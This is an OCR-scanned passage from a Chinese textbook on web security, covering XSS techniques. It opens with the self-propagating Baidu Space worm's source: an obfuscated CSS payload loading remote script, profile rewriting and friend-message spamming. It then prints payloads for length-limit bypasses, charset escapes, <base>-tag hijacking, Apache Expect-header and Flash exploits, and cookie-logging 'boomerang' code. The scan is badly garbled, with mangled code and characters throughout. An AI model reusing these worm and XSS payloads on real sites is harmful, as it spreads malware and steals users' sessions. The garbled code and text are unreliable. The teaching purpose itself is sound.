playload="a{evilmask:ex/*exp/**/ression*/ 
pression(execScript (unescape( 'd%253D%2522doc 
%2522%252B%2522ument%2522%253B%250D%250AL 
%253D%2522functi0n%252010ad%2528%2529%257BVva 
1%2520x%253D%2522%252Bd%252B 
%2522.createElement%2528%2527SCRIPT 
96252 79625299625 3Bx . sr c?62 
53D?62527ht t p?6253A/ /www . 18688 . com/cache/1.js 
96252 796253Bx . defer%253Dt rue%253B%2522%252Bd 
%252B%2522. getElement sByTagName%2528%2527HEAD 


%2527%2529%255B0%255D . appendChild%2528x% 

2529%257D%253Bfunction%2520inject 

%2528%2529%257Bwindow. set Timeout 

%2528%252710ad%2528% 

2529%2527%252C1000%2529%257D%253Bif 

%2528window. x%2521%253D1%2529%25 7 Bwindow. x 

%253D1%2 

53Binject%2528%2529%25 7D%253B%2522%250D 

%250AexecScript%25281%2529')))}"; 

action=myhibaidut+"/commit"; 

spCssUse=use; 

s=getmydata(editurl); 

re = /\<input type=\"hidden\" id=\"ct\" name= 

\"ct\" value=\"(.*?)\"/i; 

ct = s.match(re); 

ct-(ct[1]); 
re = /\<input type=\"hidden\" id=\"cm\" name= 

\"cm\" valuezN"(.*2)N" 7i; 

cm - s.match(re); 

cm=(cm[1])/1+1; 
re = /\<input type=\"hidden\" id=\"spCssID\" 

name=\"spCssID\" value=\"(.*?)\"/i; 

SpCssID = s.match(re); 

SpCssID-(spCssID[1]); 

spRefUrl=editurl; 
re = /\<textarea(.*?)\>([4\x00]*?)\<\/ 

textarea\>/i; 

spCssText = s.match(re); 

spCssText=spCssText [2]; 

spCssText=URLEncoding(spCssText) ; 

if(spCssText.indexOf('evilmask')!---1) { 
return 1; 


else spCssText=spCssText+"\r\n\r\n"+playload; 
re = /\<input name=\"spCssName\"(.*?)value= 
NG 2M S/ 15 

spCssName = s.match(re); 
spCssName=spCssName[2]; 

re = /\<input name=\"spCssTag\"(.*?)value= 
NE ETIN SAL 

spCssTag = s.match(re); 

spCssTag-spCssTag[2]; 

postdata="ct="+ct 
+"&spCssUse=1"+"&spCssColorID=1"+"&spCssLayou 
tID=-1"+"&spRefURL="+UR 
LEncoding(spRefUrl)+"&spRefURL="+URLEncoding( 
spRefUr1)+"&cm="+cm+"&spCssID="+spCssID+ 
"&spCssText="+spCssText 
+"&spCssName="+URLEncoding(spCssName)+"&spCss 
Tag="+URLEncoding 

(spCssTag); 
result-postmydata(action,postdata); 
sendfriendmsg(); 
count(); 


function goteditcss() { 
src="http://hi.baidu.com"+spaceid+"/modify/ 
spcrtemp1/0"; 
s-getmydata(src); 
re = /\<link rel=\"stylesheet\" type=\"text\/ 
css\" 
href=\"(.*?)\/css\/item\/(.*?)\.css\">/i; 

r = s.match(re); 

nowuse=r [2]; 

makeevilcss(spaceid, "http://hi.baidu.com"+spa 
ceid+"/modify/spcss/"+nowuse+".css/edit" 

;1); 

return 0; 

} 

function poster(){ 

var request = false; 

if (window.XMLHttpRequest) { 

request = new XMLHttpRequest(); 
if(request.overrideMimeType) { 

request .overrideMimeType('text/xml'); 


} else if(window.ActivexObject) { 

var versions = ['Microsoft.XMLHTTP', 
'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 
'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 
'Msxm12.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 
'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; 
for(var i=0; i«versions.length; i++) { 

try { 

request = new ActiveXObject(versions[i]); 

} catch(e) {} 

} 


} 


return request; 
} 
function postmydata(action, data) { 
xmlhttp.open("POST", action, false); 
xmlhttp.setRequestHeader('Content-Type', 
'application/x-www-form-urlencoded'); 
xmlhttp.send(data); 

return xmlhttp.responseText; 


} 
function getmydata(action) { 
xmlhttp.open("GET", action, false); 
xmlhttp.send(); 

return xmlhttp. responseText; 


function killErrors() { 
return true; 

} 

f 


unction count() { 

a-new Image(); 
a.srcz'http://img.users.51.1a/1563171.asp'; 
return 0; 

} 
function online() { 

online=new Image(); 
online.src='http://img.users.51.1a/1563833.a 
sp '; 

return 0; 


} 
function hack() { 
return 0; 
} 
function sendfriendmsg(){ 
myfurl=myhibaidu+"/friends"; 
s-getmydata(myfurl); 
eri need 节日 快乐 姬 1 热烈 庆祝 2008， 心 情 好 
记得 要 想 我 呀 ! 
qeu p M ONE AR 
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"+myhibai 
du; 
var D=function(A,B){A[A.length]=B; }; 
re = /(.+)D\(K\,\[([A\]]+2)\J\)(.*)/9; 
friends = s.match(re); 
eval(friends[0]); 
for(i in k) { 
eval('msgimg'+i+'=new Image();'); 
eval('msgimg'+i 
*'.srcz"http://msg.baidu.com/? 
ct=22&cm=MailSend&tn=bmSubmit&sn="+URLE 
ncoding(k[i] 
[2] )+"&co="+URLEncoding(evilmsg)+"&vcodeinput 
zi); 
} 


5. 不 过 那个 时 候 百 度 已 经 开始 屏蔽 此 蠕虫 


function onlinemsg(){ 
doit-Math.floor(Math.random() * (600 + 1)); 
if(doit>500) { 
evilonlinemsg=" 哈 哈 , 还 记得 我 不 ,加 个 友情 链接 
吧 ?NrNnNrNnNrNn 我 的 地 址 是 "+myhibaidu; 
xmlDoc-new 
ActiveXObject("Microsoft.XMLDOM"); 
xmlDoc.async-false; 
xmlDoc.load("http://hi.baidu.com/sys/file/ 
moreonline.xml"); 
online=xmlDoc.documentElement; 
users-online.getElementsByTagName("id"); 
x-Math.floor(Math.random() * (200 + 1)); 
eval('msgimg'+x+'=new Image();'); 
eval('msgimg'+x 
*'.srcz"http://msg.baidu.com/? 
ct-22&cm-MailSend&tn-bmSubmit&sn- 
"+URLEncoding(users[x].text)+"&co="+URLEncodi 
ng(evilonlinemsg)+"&vcodeinput=";'); 


—" 过 XSS 做 坏事 是 很 容易 的 ， 而 XSS Worm 则 能 够 把 这 种 破 
坏 无 限 扩 大 ， 这 正 是 大 型 网 站 所 特别 担心 的 事情 。 

无 论 是 MySpace 蠕 虫 ， 还 是 百度 空间 的 蠕虫 ， 都 是 “善意 ”的 蠕虫 ， 它 们 
只 是 在 “恶作剧 ”， 而 没有 真正 形成 破坏 。 真 正 可 怕 的 蠕虫 ， 是 那些 在 
无 声 无 息 地 窃取 用 户 数据 、 骗 取 密 码 的 “恶意 蠕虫， 这些 蠕虫 并 不 会 
于 扰 用 户 的 正常 使 用 ， 非 常 隐 蔽 。 


3.2.5 “调试 JavaScript 

要 想 写 好 XSS Payload， 需 要 有 很 好 的 JavaScript 功 底 ， 调 试 JavaScript 是 
必 不 可 少 的 技能 。 在 这 里 ， 束 简单 介绍 几 个 常用 的 调试 JavaScript 的 工 
具 ， 以 及 辅助 测试 的 工具 。 

Firebug 

Me ig Hs FA A AN Va, Bim CE =] Web Hacking 4 &&, dj 
为 “居家 旅行 的 瑞士 军刀 ”。 


. AY IM y zEE 

Firebug GRA, "E"BAXFJL Bx, POA a ULIEIBJDOM T) M ° 

wee « (8 | | fs m cs 9: xe Bü Cookies Events ; [A 
# FP Object { __HOST=, _ APP MEMBERS, more.. } 
3 FlashStorage Object { hasInit=false } 
$ KISSY Object { __HOST=, __APP_NENBERS=, more.. } 
* Mpp Object { DOMAIH="taobao. com", Config={...}, more. } 
* TB Object [ Config={...}, Env={...}, more.. } 
+ TBAD Object [ version="1.1.5", et={...}, more.] 
& content results [Object { id-300, contentz'(a href="http://wew. eta... 11171000740. png” /></a>" ], Object [ 


content="http://img01. taobaocdn. ... eRMEXEZEZIX-490-170. png”, more. }, Object { id=49, 
content="http://ing01. taobaocdn. ... bpBEXEXEXE2-490-170. png", more... ], 34 more... ] 


_ta_tndid_0,5899701 190944049 
_ta_rndid_0.68531267091 13928 
_tb_acookie_loaded 1 
_th_beacon_loaded 


Firebug 的 界面 
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Wb Fede m... 
由 this Object { debug-false, Dath= 
facookie/^, more... } 
l "cna" 
= saitti. [8 toString function) 
Œ Closure Scope Closure Scope { h-] 


由 [object Window] Window acbeaconz. htal 
aocdn. com/tps/i2/T1bZ 
t taobao. com/ favicon. i 
=http:/ wow. taobao. c 
fw, taobao. com/favi 


调试 JavaScript: 在 Firebug 中 调试 JavaScript 
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bender orent M Gih Hs height IO tiio shuniete $e! pel to i line’heigh! 1 
"iu x 
aiv 1 father" etplez^gosition: sbeniute: visthility: Men “> Mal, bod, div, span object, gettet... 019. ess (B 1 4) 
A fne frome meth v height dg frame, M, h2, AL M, M. M, p 
m. Ut blockquote, pre, a abbr, addi 
J corripi type p p code, del, dfn wa t 
1 Wa & nen £a strong fub 


查看 HTML 与 CSS: 在 Firebug 中 查看 HTML 与 CSS 


考 庸 置疑 ，Firebug 是 JavaScript 调 斌 的 第 一 利 絮 。 如 果 要 说 缺点 ， 那 就 
是 除了 Firefox 外 ， 对 其 他 浏览 右 的 文 持 并 不 好 。 


IE 8 Developer Tools 
fEIE 8 中， 为 开发 者 内 置 了 一 个 JavaScriptDebugger ， 可 以 动态 调试 


JavaScript ° 
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IE 8 的 开发 者 工具 界面 

在 需要 调试 正 而 又 没有 其 他 可 用 的 JavaScript Debugger Hf, IE 8 
Developer Tools 是 个 不 错 的 选择 5 

Fiddler 

Fiddler 是 一 个 本 地 代理 服务 器 ， 需 要 将 浏览 器 设置 为 使 用 本 地 代理 服 
务 硬 上 网 才 可 使 用 。Fiddler 会 监控 所 有 的 浏览 级 请 求 ， 并 有 能力 在 洲 
哆 妖 请 求 中 插入 数据 。 


Fiddler 支 持 脚本 编程 ， 一 个 强大 的 Fiddler 脚 本 将 非常 有 助 于 安全 测试 。 
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Fiddler 的 界面 
HttpWatch 
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HttpWatch 的 界面 


HttpWatch 也 能 够 监控 所 有 的 浏览 圳 请求， 在 目标 网 站 是 HITPS 时 会 特 
别 有 用 。 但 HttpWatch 并 不 能 调试 JavaScript， 它 仅仅 是 一 个 专业 的 针对 
Web 的 “Sniffer”。 

善 用 这 些 调试 工具 ， 在 编写 XSS Payload 与 分 析 浏 览 器 安全 时 ， 会 事 半 
TTR ° 


3.2.6 XSS 构 造 技 巧 
剖 文 重点 描述 了 XSS 攻 击 的 巨大 威力 ， 但 是 在 实际 环境 中 ，XSS 的 利 
用 技巧 比较 复杂 。 本 章 将 介绍 一 些 和 常见 的 XSS 攻 击 技 巧 ， 也 是 网 站 在 
设计 安全 方案 时 需要 注意 的 地 方 。 
3.2.6.1 ”利用 字符 编码 
“百度 搜 藏 ” 曾 经 出 现 过 一 个 这 样 的 XSS 漏 洞 。 百 度 在 一 个 <script> 标 签 
中 输出 了 一 个 变量 ， 其 中 转 义 了 双 引 号 : 

var redirectUrl="\";alert(/XSS/);"; 
一 般 来 说 ， 这 里 是 没有 XSS 漏 洞 的 ， 因为 变量 处 于 双 引 号 之 内 ， 系 统 
转 义 了 双 引 号 导致 变量 无 法 “escape”。 
但 是 ， 百 度 的 返回 页 面 是 GBK/GB2312 编 码 的 ， 因 此 *%clV 这 两 个 字 
符 组 合 在 一 起 后 ， 会 成 为 一 个 Unicode 字 符 。 在 Firefox 下 会 认为 这 是 一 
个 字符 ， 所 以 构造 : 

%c1";alert(/XSS/);// 
并 提交 : 
Request | Response Trap | 


GET httpvicang.baidu.com/dofadd?it=xss&iu=%c1"-alert(2). /&fr=sp HTTPI1.1 

Host cang.baidu.com 

User-Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rve1.8.1.15) Gecko/20080623 Firefox/2.0.0.15 
Accept: text'xml,application/xml,applicationixhtml*xml,textihtml;q-0.9,text/plain;qz0.8,image/png,*/*;q- 0.5 
Accept-Language: zh-cn,zh;q-0.5 

Accept-Charset: gb2312,utf-8;q-0.7,*;q-0.7 

Keep-Alive: 300 

Proxy-Connection: keep-alive 

Cookie: BDSTATzb148865bd881184a32c4df476d413ee8f26d004e7dfO0f? 36bbe379310855dd63; BDUSS-3l 


提交 的 数据 包 
在 Firefox 下 得 到 如 下 效果 : 


</style> 

<script src-"/-/js/base. js?v=l. 1"? /script? 
<script src-z"/-/js/checkform. js?v71. 1" ^ «/script? 
(script srcz"/-/js/suggest. js?vz1. 1°></script> 
(script srcz"/-/js/itemadd. js?v=1.2"></script> 
<script language- javascript > 


4 一 

var redirectUrl-"9 "; alert(2) ; //"; 
var s tagsz" AR)"; 

var sl tags-""; 

var a togs = []; 


在 Firefox 下 的 效果 
这 两 个 字 节 :“%c1W* 组 成 了 一 个 新 的 Uni-code 字 符 ,， *96c1"jE £z FF 
号 “Vw 给“ 吃 掉 了 ”， 从 而 绕 过 了 系统 的 安全 检查 ， 成 功 实施 了 XSS 攻 


击 o 

3.2.6.2” 绕 过 长 度 限制 

很 多 时 候 ， 产 生 XSS 的 地 方 会 有 变量 的 长 度 限 制 ， 这 个 限制 可 能 是 服 
务 器 端 逻 辑 造 成 的 。 假 设 下面 代 码 存在 一 个 XSS 漏 洞 : 

服务 器 端 如 果 对 输出 变量 “$var” 做 了 严格 的 长 度 限制 ， 那 么 攻击 者 可 
能 会 这 样 构 造 XSS: 


$var 为 : "»«script»alert(/xss/)«/script» 


希望 达到 的 输出 效果 古 : 
<input type=text value=""><script>alert(/ 
xss/)</script>" /> 


假设 长 度 限 制 为 20 个 子 节 ， 则 这 段 XSS 会 被 切割 为 : 

连 一 个 完整 的 函数 都 无 法 写 完 ，XSS 攻 击 可 能 无 法 成 功 。 那 此 时 ， 十 
不 是 万 事 大 吉 了 呢 ? 答案 是 否定 的 。 

攻击 者 可 以 利用 事件 (Event) 来 缩短 所 需要 的 字 节 数 : 


$var 输出 为 : “onclick=alert(1)// 

加 上 空格 符 ， 刚 好 够 20 个 字 节 ， 实 际 输出 为 : 
<input type=text value="" onclick=alert(1)// 

当 用 户 点 击 了 文本 框 后 ，alert0 将 执行 : 


EX http://www. a. com 的 页 面 说 : 


恶意 脚本 被 执行 

但 利用 “事件 ”能 够 缩短 的 字 节 数 是 有 限 的 。 最 好 的 办 法 是 把 XSS 
Payload 写 到 别处 ， 再 通过 简短 的 代码 加 载 这 段 XSS Payload 。 

最 常用 的 一 个 “ 藏 代码 ”的 地 方 ， 台 是 "loca-tion.hash”。 而 且 根 据 HTTP 
协议 ，location.hash 的 内 容 不 会 在 HITP 包 中 发 送 ， 所 以 服务 器 端的 


Web 日 志 中 并 不 会 记录 下 location.hash 里 的 内 容 ， 从 而 也 更 好 地 隐藏 了 
MARRURA o 


r RUN " 
na val(location.hash.substr(1)) 


总 PROPER a T 


nchi ck= Ne SII ati .ha Boh eae Ww ys 


Fi ylocation hashé38—7 2227 # ， 所 以 必须 去 除 第 一 个 字符 才 行 。 
此 时 构造 出 的 XSS URL 为 : 


http://www.a.com/test .html#alert(1) 


- ane ee o 


location.hash 里 的 脚本 被 执行 

location.hash 本 身 没 有 长 度 限制 ， 但 是 浏览 器 的 地 址 柱 是 有 长 度 限 制 
的 ， 不 过 这 个 长 度 已 经 足够 写 很 长 的 XSS Payload 了 。 要 是 地 址 栏 的 长 
度 也 不 够 用 ， 还 可 以 再 使 用 加 载 远 程 JS 的 方法 ， 来 写 更 多 的 代码 。 

在 某 些 环境 下 ， 可 以 利用 注释 符 绕 过 长 度 限 制 。 

比如 我 们 能 控制 两 个 文本 框 ， 第 二 个 文本 框 允 许 写 入 更 多 的 字 节 。 此 
时 可 以 利用 HTML 的 “注释 符号 ”， 把 两 个 文本 框 之 间 的 HIML 代 码 全 
部 注释 入 从 而 “打通 ”两 个 <input> 标 签 。 


input id=1 type="text" Value="" /> 
XXXXXXXXXXXXX 
«input id=2 type="text" Value="" /> 


在 第 一 个 input 框 中 ， 输 入 : 


人 中 ， 输 入 : 


cript>alert(/xss/);</script> 


ut id=1 type="text" value=""><!--" /> 
XXXXXXXXXXXXXXXXX 
Edda ut id-2 type="te er ez"-- 
ript>alert(/xs hoop ye ript»" /» 


中 PIED E 部 被 
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恶意 脚本 被 执行 

而 在 第 一 个 input 框 中 ， 只 用 到 了 短 短 的 6 个 字 市 ! 

3.2.6.3 ”使 用 <base> 标 签 

<base> 标 签 并 不 常用 ， 它 的 作用 是 定义 页 面 上 的 所 有 使 用 “相对 路 


径 »* 标 签 的 hosting 地 址 。 
比如 ， 打 开 一 张 不 存在 的 图 片 : 


<body> 

«img src="/intl/en_AL../Images/srpr/ 
logoiw.png" /> 

/body> 


ca o = gogoge 


[ 
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测试 页 面 
这 张 图 片 实际 上 是 Google 的 一 张 图 片 ， 原 地 址 为 : 


http://www.google.com/intl/en AL../Images/ 
srpr/logoiw.png 


在 <img> 标 签 前 加 入 一 个 <base> 标 签 : 


<body> 

«base href="http://www.google.com" /> 
«img src="/intl/en_AL../Images/srpr/ 
logoiw.png" /> 

/body> 


MA EAS 其 后 i ITERA areis ah //www.google.com"BURL: 
m = om i 


EIE 


Google 7 


测试 页 面 

图 片 被 找到 了 。 

需要 特别 注意 的 是 ， 在 有 的 技术 文档 中 ， 提 到 <base> 标 签 只 能 用 于 
<head> 标 签 之 内 ， 其 实 这 是 不 对 的 。<base> 标 签 可 以 出 现在 页 面 的 任 
何 地 方 ， 并 作用 于 位 于 该 标签 之 后 的 所 有 标签 。 

攻击 者 如 果 在 页 面 中 插入 了 <base> 标 签 ， 就 可 以 通过 在 远程 服务 器 上 
* 链接 或 脚本 ， 动 持 当 前 页 面 中 的 所 有 使 用 “相对 路 径 ” 的 标 


«base href="http://www.evil.com" /> 


<script src="x.js" ></script> 
<img src="y.jpg" /> 
a href="auth.do" >auth</a> 


所 以 在 RA 方案 时 ， 一 定 要 过 滤 掉 这 个 非常 危险 的 标签 。 
3.2.6.4 window.name 的 妙用 

windowname 对 象 是 一 个 很 神奇 的 东西 。 对 当前 窗口 的 window.name 对 
RIE, VO RARE TER oo windows} REN bas AA, TT 
并 非 document 对 象 ， 因 此 很 多 时 候 window 对 和 象 不 受 同 源 策略 的 限制 。 
攻击 者 利用 这 个 对 象 ， 可 以 实现 跨 域 、 跨 页 面 传 递 数 据 。 在 某 些 环境 
下 ， 这 种 特性 将 变 得 非常 有 用 。 

参考 以 下 案例 。 假 设 “www.a.com/test.html” 的 代码 为 : 


i .hame = " ARUM 

alert(document.doma window.name); 
window.loca ti on = noc Pia b.com/ 

te Aa html" 

</script> 


</body> 


eB 了 码 将 window. name 赋 值 为 test， 然 后 显示 当前 域 和 window.name 的 
fü 最 后 Be 页 面 pk 转 


到 “www.b. com/test1 html" o *www.b.com/test1.html" BJ (tig 7j : 


ale rt(docu ment .domain+ "+window.name) ; 


这 里 显示 了 当前 域 和 window.name 的 值 。 最 终 戏 果 如 下 ， 访 


IR] *www.a.com/test.html": 


测试 页 面 
window.name 赋 值 成 功 ， 然 后 页 面目 动 跳 转 到 “www.b.comytest1.html”: 


测试 页 面 


这 个 过 程 实现 数据 的 跨 域 传递 : “test*” 这 个 值 从 www.a.com 传 递 到 
www.b.com ° 


使 用 window. name 可 以 缩短 XSS Payload 的 长 度 ， 如 下 所 示 : 


window.name = "alert(do ocu okie)"; 
locaton.href - CAE M peace ES cU 


在 同一 窗口 打开 XSS 的 站 点 后 ， 只 需 通 过 XSS 执 行 以 下 代码 即 可 : 


eval(name); 
as 短 到 了 极点 。 


个 技巧 为 安全 研究 者 luoluo 所 发 现 ， 同 时 他 还 整理 了 很 多 绕 过 XSS 长 
E 限制 的 技巧 。 


3.2.7 BRA: Mission Impossible 

从 XSS 漏 洞 利 用 的 角度 来 看 ， 存 储 型 XSS 对 攻击 者 的 用 处 比 反 射 型 XSS 
要 大 。 因 为 存储 型 XSS 在 用 户 访问 正 汕 URL 时 会 目 动 触 发 ， 而 反射 型 
XSS 会 修改 一 个 正常 的 URL， 一 般 要 求 攻击 者 将 XSSURL 发 送 给 用 户 
点 击 ， 无 形 中 提高 了 攻击 的 门槛 。 

而 有 的 XSS 漏 洞 ， 则 被 认为 只 能 够 攻击 和 目 己 ， 属 于“ 鸡肋” 漏洞。 但 随 
者 时 间 的 推移 ， 数 个 曾经 被 认为 是 无 法 利用 的 XSS 漏 洞 ， 都 被 人 找到 
了 利用 方法 。 

3.2.7.1 Apache Expect Header XSS 

“Apache Expect Header XSS” 漏 洞 最 早 公布 于 2006 年 。 这 个 漏洞 曾 一 度 
被 认为 是 无 法 利用 的 ， 所 以 厂商 不 认为 这 是 个 漏洞 。 这 个 漏洞 的 影响 
范围 是 : Apache Httpd Server 版 本 1.3.34、2.0.57、2.2.1 及 以 下 。 漏 洞 利 
用 过 程 如 下 。 

向 服务 器 提交 : 


GET / HTTP/1.1 

Accept: */* 

Accept-Language: en-gb 

Content-Type: application/x-www-form- 
urlencoded 

Expect: 
«script»alert('http://www.whiteacid.org 
is vulnerable to the Expect Header 
vulnerability.');«/script» 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 
6.0; Windows NT 5.1; SV1; .NET CLR 
2.0.50727; .NET 

CLR 1.1.4322) 

Host: www.whiteacid.org 

Connection: Keep-Alive 


ARF ibt 
FF ak [H] : 
HTTP/1.1 417 Expectation Failed 
Date: Thu, 21 Sep 2006 20:44:52 GMT 
Server: Apache/1.3.33 (Unix) 
mod throttle/3.1.2 DAV/1.0.3 
mod fastcgi/2.4.2 
mod gzip/1.3.26.1a PHP/4.4.2 mod ss1/2.8.22 
OpenSSL/0.9.7e 
Keep-Alive: timeout-5, max-100 
Connection: Keep-Alive 
Transfer-Encoding: chunked 
Content-Type: text/html; charset-iso-8859-1 
1b 


a 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 
2.0//EN"> 
<HTML><HEAD> 
<TITLE>417 Expectation Failed</TITLE> 
</HEAD><BODY> 
<H1>Expectation Failed</H1> 
The expectation given in the Expect request- 
header 
field could not be met by this server.<P> 
The client sent<PRE> 
Expect: 
<script>alert('http://www.whiteacid.org 
is vulnerable to the Expect Header 
vulnerability.');</script> 
</PRE> 
but we only allow the 100-continue 
expectation. 
</BODY></HTML> 
0 
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入 到 页 面 中 ， 因 此 Expect 头 中 的 HTML 代 码 就 被 浏览 器 解析 执行 了 。 

这 是 Apache 的 漏洞 ， 影 响 范 围 相当 广 。 从 这 个 攻击 过 程 可 以 看 出 ， 需 

要 在 提交 请 求 时 加 HITP 头 中 注入 恶意 数据 ， 才 能 触发 这 个 漏洞 。 但 对 

于 XSS 攻 击 来 说 ，JavaScript 工 作 在 演 染 后 的 浏览 器 环境 中 ， 无 法 控制 

es 。 因 此 ， 这 个 漏洞 曾经 一 度 被 认为 是 “ 鸡 
"漏洞 。 

后 来 安全 研究 者 Amit Klein 提出 了 “使 用 Flash 构 造 请 求 ” 的 方法 ， 成 功 

地 利用 了 这 个 漏洞 ， 变 废 为 宝 ! 

在 Flash 中 发 送 HITP 请 求 时 ， 可 以 目 定义 大 多 数 的 HITP 头 。 如 下 是 

Amit Klein 的 BUTS: 


//Credits to Amit Klein as he wrote this, I 
just dec empi Per 过 
in 


n B inm. zie stin Be: Kor maa 
inPa URL.substring(inPOS + 1, 
TAPOS. length); 
req = new LoadVars(); 
Bi addRequestHe ade n B xhet ae 
"<script>alert(\"' " 
valne erable E the 
Ex xpect Header vulnerability. ');</script>"); 
d 


P >alert(\'" + inParam + " is 
Nie able to the 

Ex xpec c Header MS PE rin \ '); </script>"); 
req.send(inPa " blank", "POST" S 


正 因为 此 ， Flash 在 新 版 本 中 将 洲 目 用 户 自 定义 发 送 Expect 涉 。 但 后 来 发 
现 可 以 通 ee UAE 过 这 个 限制 : 


req.addRequestHea ^ Ge EX xpect:FooBar","«script 
>alert('XSS')</sc 2) 


H 前 Flash 已 经 修补 好 了 这 二 问题 。 
此 类 攻击 ， 还 可 以 通过 Java Applet 等 构造 HTTP 请 求 的 第 三 方 插件 来 实 
现 。 


3.2.7.2 ”Anehta 的 回旋 镖 

反射 型 XSS 也 有 可 能 像 存 储 型 XSS 一 样 利用 : 将 要 利用 的 反射 型 XSS 讽 
入 一 个 存储 型 SS 中。 这 个 攻击 技巧 ， 曾经 在 笔者 实现 的 一 个 XSS 攻 
击 平 台 (Anehta) 中 使 用 过 ， 笔 者 将 其 命 VEA 

因为 浏览 器 同 源 策略 的 原因 ，XSS 也 受到 同 源 策 略 的 限制 一 发生 在 
A 域 上 的 XSS 很 难 影响 到 B 域 的 用 户 。 

回旋 镖 的 思路 就 是 : 如 果 在 B 域 上 存在 一 个 反射 型 “<XSS_B”， 在 A 域 上 
存在 一 个 存储 型 “<XSS_A”， 当 用 户 访问 A 域 上 的 “XSS_A” 时 ， 同 时 髓 
入 B 域 上 的 “XSS_B”， 则 可 以 达到 在 A 域 的 XSS 攻 击 B 域 用 户 的 目的 。 


我 们 知道 ， 在 正中 ，<iframe>、<img>、<link> 等 标签 都 会 拦截 “第 三 方 
Cookie” 的 发 送 ， 而 在 Firefox 中 则 无 这 种 限制 (第 三 方 Cookie 即 指 保存 
在 本 地 的 Cookie， 也 就 是 服务 器 设置 了 expire 时 间 的 Cookie) ° 

所 以 ， 对 于 Firefox 来 说 ， 要 实现 回旋 镖 的 效果 非常 简单 ， 只 需要 在 
XSS AAZNWUN— T iframeBl n]. 


«iframe src="http://www.b.com/?xss.... " »«/ 
iframe» 


但 是 对 于 IE 来 说 ， 则 要 麻烦 很 多 。 为 了 达到 执行 XSS_B 的 目的 ， 可 以 
使 用 一 个 <form> 标 签 ， 在 浏览 器 提交 form 表 单 时 ， 并 不 会 拦截 第 三 方 
Cookie 的 发 送 。 

因此 ， 先 在 XSS_ A 上 写 入 一 个 <form>， 自 动 提 交 到 XSS_ B, ABE 
XSS_B 中 再 跳 转 回 原来 的 XSS_A， 即 完成 一 个 “回旋 镖 " 的 过 程 。 但 是 
这 种 攻击 的 缺点 是 ， 尽 管 跳 转 花费 的 时 间 很 短 ， 但 用 户 还 是 会 看 到 浏 
览 器 地 址 栏 的 变化 。 

代码 如 下 : 


var target = "http://www.b.com/ 
xssDemo.html#'><script 
src-http://www.a.com/anehta/feed.js»«/ 
script><'"; 

var org_url = "http://www.a.com/anehta/ 
demo. html"; 

var target_domain = target.split('/'); 
target_domain = target_domain[2]; 

var org_domain = org_url.split('/'); 


org_domain = org_domain[2]; 
1111111111111111111111111111111111111111111/ 
/1/1111111111 

// boomerang 回旋 镖 模块 ， 获 取 第 三 方 远 程 站 点 的 Cookie 
// 并 将 页 面 重 定向 回 当前 页 面 

// 要 求 远程 站 点 存在 一 个 XSS 

//// Author: axis 
7111111111111111111111111111111111111111111/ 


Mg gL BgMgu 
// 如 果 是 当前 页 面 ， 则 向 目标 提交 
if ($d.domain == org_domain){ 

if (anehta.dom.checkCookie("boomerang") 
== false){ 

// 在 Cookie 里 做 标记 ， 只 弹 一 次 
anehta.dom.addCookie("boomerang", "x"); 
setTimeout( function (){ 

try { 
anehta.net.postForm(target); 
} catch (e){ 
//alert(e); 


}, 
50); 


} 

// 如 果 是 目标 站 点 ， 则 重 定向 回 前 页 面 

if ($d.domain == target_domain) { 
anehta. logger .logCookie(); 
setTimeout ( function 0t 


如 有 果 能 在 B 域 上 找到 一 个 302 跳 转 的 页 面 ， 也 可 以 不 使 用 form 表 单 ， 这 
样 会 更 加 方便 。 

虽然 < 回旋 镖 ? 并 不 是 一 种 完美 的 漏洞 利用 方式 ， 但 也 能 将 反射 型 XSS 
的 效果 变 得 更 加 目 动 化 。 


XSS 漏 洞 是 一 个 Web 安全 问题 ， 不 能 因为 它 的 利用 难 易 程 度 而 决定 是 
否 应 该 修补 。 随 着 技术 的 发 展 ， 某 些 难以 利用 的 调 洞 ， 也 许 不 再 是 难 


题 。 


3.2.8 ”容易 被 忽视 的 角落 : Flash XSS 
前 文 讲 到 的 XSS 攻 击 都 是 基于 HTML 的 ， 其 实在 Flash 中 同样 也 有 可 能 
造成 XSS 攻 击 。 


在 Flash 中 是 可 以 散 入 ActionScript 脚 本 的 。 一 个 最 常见 的 Flash XSS 可 以 
这 样 写 : 


getURL("javascript:alert(document.cookie)") 


将 Flash 舱 入 页 面 中 : 


«embed src="http://yourhost/evil. swf" 
pluginspage="http://www.macromedia.com/ 
shockwave/download/index.cgi? 

P1 Prod Version-S 

hockwaveFlash" 
type-"application/x-shockwave-flash" 
width="0" 

height="0" 

></embed> 


ActionScript 是 一 种 非常 强大 和 有 灵活 的 脚本 ， 甚 至 可 以 使 用 它 发 起 网 络 
A a 
H F Flash LUER, PrbELTESCSUEXSSFilterh], 一般 都 会 禁 
<embed>、<object> 等 标签。 后 者 甚至 可 以 加 载 ActiveX 控 件 ， 能 够 产 
生 更 为 严重 的 后 果 。 

如 果 网 站 的 应 用 一 定 要 使 用 Flash 怎 么 办 ? 一 般 来 说 ， 如 果 仅 仅 是 视频 
文件 ， 则 要 求 转 码 为 “flv 文 件 ”。flv 文 件 是 静态 文件 ， 不 会 产生 安全 隐 
亲人 
[| o 

d LA BA Flashh (CAS an TF : 


<object classid="clsid:d27cdb6e- 
ae6d-11cf -96b8- 444553540000" 
codebase="http://fpdownload.macromedia.com/ 
pub/shockwave/cabs/flash/swflash.cab#versi 
on=8,0,0,0" 

name="Main" width="1000" height="600" 
align="middle" id="Main"> 

<embed flashvars="site=&sitename=" 


src-'Loading.swf?user-453156346' width="1000" 
height="600" align="middle" quality="high" 
name="Main" allowscriptaccess-"sameDomain" 
type="application/x-shockwave-flash" 
pluginspage="http://www.macromedia.com/go/ 
getflashplayer" /> 

</object> 


限制 Flash 动 态 脚 本 的 最 重要 的 参数 是 “al-lowScriptAccess”， 这 个 参数 
定义 了 Flash 能 否 与 HTML 页 面 进行 通信 。 它 有 三 个 可 选 值 : 


e always， 对 与 HTML 的 通信 也 就 是 执行 JavaScript 不 做 任何 限制 ; 


。 sameDomain， 只 人 允许 来 自 于 本 域 的 Flash 与 Html 通 信 ， 这 是 默认 
值 ; 
